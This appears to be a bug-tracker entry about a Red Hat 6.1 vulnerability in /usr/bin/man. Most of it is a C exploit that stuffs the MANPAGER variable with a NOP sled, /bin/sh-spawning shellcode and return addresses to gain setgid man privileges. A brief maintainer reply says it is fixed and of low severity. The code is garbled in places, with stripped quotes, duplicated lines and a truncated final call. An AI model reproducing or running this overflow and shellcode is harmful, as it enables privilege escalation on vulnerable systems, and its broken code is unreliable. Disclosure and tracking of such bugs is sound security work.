DOH! /* * (c) 2000 babcia padlina / b0f * (lcamtufs idea) * * redhat 6.1 /usr/bin/man exploit*/ #include <stdio.h> #include <sys/param.h> #include <sys/stat.h> #include <string.h> #define NOP 0x90 #define OFS 1800 #define BUFSIZE 4002 #define OFS 1800 #define BUFSIZE 4002 #define ADDRS 1000 long getesp(void){ __asm__(movl %esp, %eax\n);} int main(argc, argv)int argc; char **argv; { char *execshell = \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/sh; char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1))) { perror(malloc()); return -1; } if (argc > 1) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = \0; memset(buf, NOP, noplen); buf[noplen+1] = \0; strcat(buf, execshell); p = buf + noplen + strlen(execshell); ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = \0; fprintf(stderr, RET: 0x%x len: %d\n\n, ret, strlen(buf)); setenv(MANPAGER, buf, 1); execl(/usr/bin/man, man, ls, 0)
This is fixed in the 2 most recent rawhide packages (1.5g-8 and 1.5h1-1). It's not a serious problem though; at worst you can get setgid man, meaning you can write to /var/catman.
*** Bug 10338 has been marked as a duplicate of this bug. ***